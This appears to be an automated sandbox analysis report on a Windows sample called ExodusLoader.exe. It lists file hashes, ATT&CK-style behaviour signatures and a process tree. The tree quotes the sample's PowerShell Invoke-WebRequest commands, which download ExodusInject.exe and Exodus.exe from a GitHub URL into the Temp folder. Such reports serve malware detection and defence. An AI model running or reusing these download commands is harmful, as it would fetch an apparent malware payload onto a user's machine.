Analysis
-
max time kernel
20s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 04:15
Static task
static1
Behavioral task
behavioral1
Sample
ExodusLoader.exe
Resource
win7-20241010-en
General
-
Target
ExodusLoader.exe
-
Size
89KB
-
MD5
2f3405fa61bec944ed9d869adb6a37e3
-
SHA1
4a3c839b899809ba89a99eaadecf4da6d71e8256
-
SHA256
ee854407da3d172d442c9aec8861d9e8fd4f7a5f8c4cbb785d7e55549a507234
-
SHA512
72c8309a2c439adb3790aaf7198d5cdfa5591703a039ca84982752dfc43213a94885aab5a82fc0cfd78e161a792d2c1684e0cae7e4e7d772cc98be4aabdc33c0
-
SSDEEP
1536:77fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAwWOn:X7DhdC6kzWypvaQ0FxyNTBfAg
Malware Config
Signatures
-
pid Process 2948 powershell.exe 2056 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ExodusLoader.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2056 powershell.exe 2948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2056 powershell.exe Token: SeDebugPrivilege 2948 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2604 wrote to memory of 2144 2604 ExodusLoader.exe 30 PID 2604 wrote to memory of 2144 2604 ExodusLoader.exe 30 PID 2604 wrote to memory of 2144 2604 ExodusLoader.exe 30 PID 2604 wrote to memory of 2144 2604 ExodusLoader.exe 30 PID 2144 wrote to memory of 2056 2144 cmd.exe 31 PID 2144 wrote to memory of 2056 2144 cmd.exe 31 PID 2144 wrote to memory of 2056 2144 cmd.exe 31 PID 2144 wrote to memory of 2948 2144 cmd.exe 32 PID 2144 wrote to memory of 2948 2144 cmd.exe 32 PID 2144 wrote to memory of 2948 2144 cmd.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6EBA.tmp\6EBB.tmp\6EBC.bat C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Exodus.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
491B
MD554436d8e8995d677f8732385734718bc
SHA1246137700bee34238352177b56fa1c0f674a6d0b
SHA25620c5e5f392f2ad19b9397fd074d117c87ca3da37f1151736dbd20322ea7e12c3
SHA51257ffc0f920bbaf36bbd22ea90c14670f44766e4b81509f54b1dec1be4443e51d8bf0997198de0851e1ea4993e5d786e21c9c1f7f17c792da88eb6bb4a324f448
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58d27ec23d3f3749fa6d222df3afd51d9
SHA1d3c48d90eae84eebb6907697d587f915dc03c823
SHA256a08c0ebf93e0d124e677dadd8265bf0becba739981c5dcb79a35f1d1f26a7141
SHA512358f41bff39283ff00f36a74b957cba2d31753824fe88d8d5a65c01418c8a944f0183bfda92996d36dad137afe70b8711a9020ece7738fb9f56e210b7d5902d6